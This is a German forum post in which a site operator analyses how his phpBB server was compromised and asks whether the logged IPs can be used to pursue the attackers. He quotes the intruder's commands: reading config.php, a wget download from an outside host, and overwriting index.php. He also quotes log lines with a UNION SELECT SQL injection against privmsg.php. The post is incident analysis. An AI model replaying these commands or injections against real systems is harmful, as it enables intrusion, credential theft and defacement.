Server gehacked

[Dumdideldum]

Hmmm,
also bedeuted das, dass besagte wget Aufrufe durch Mißbrauch der viewtopic.php stattgefunden haben ?

Also in Wahrheit nie shell access ergaunert wurde, sondern alle Befehle mittels viewtopic.php ausgeführt wurden ?

Alle besagten bösen viewtopic.php Gebräuche in der haha.txt.

Edit:
Hier ein paar "übersetzte" Befehle:

Zitat:

cat config.php na supi
ls
pico shk2.html
wget http://willysbirthday.com/images/boxoesx.gif
mv hacked.html index.php
mkdir images
....

Ich möcht nicht wissen, wie oft ich dem Serverholder gepredigt hat, dass er niemals via root account mysql connecten sollte (config.php)
Najo, sei Schuld.

Und noch was gefunden:

Zitat:

"GET /privmsg.php?folder=savebox&mode=read&p=99&pm_sql_u ser=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%%2020null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, nul HTTP/1.1" 302

"GET /privmsg.php?folder=savebox&mode=read&p=99&pm_sql_u ser=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%%2020null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, nul HTTP/1.1"

Das hab ich schon mal gesehen, und zwar in einer Hacking Anleitung von phpBB. Also war phpBB die Schwachstelle - für was gibts Updates bitte? arghl

Zusatzfrage:
Die IPs sind natürlich gespeichert, eine ist klar zuordnungsbar, zwar eine dynamische IP aus Dallas, dennoch kein anon-proxy.
Spoofing sollte nicht möglich sein, da auf dem GNU/Linux server auch eine iptables firewall gelaufen ist.

Tjo, ich schätz mal dies als Musterbeispiel geltend zu machen, was passiert, wenn man ein Script benutzt, das fehleranfällig ist und vorallem, nicht upzudaten und deppat root details zu nutzen, um mysql auszuführen.

Irgend eine Chance, mit den IPs den Verursachern zumindest auf die Finger zu klopfen ?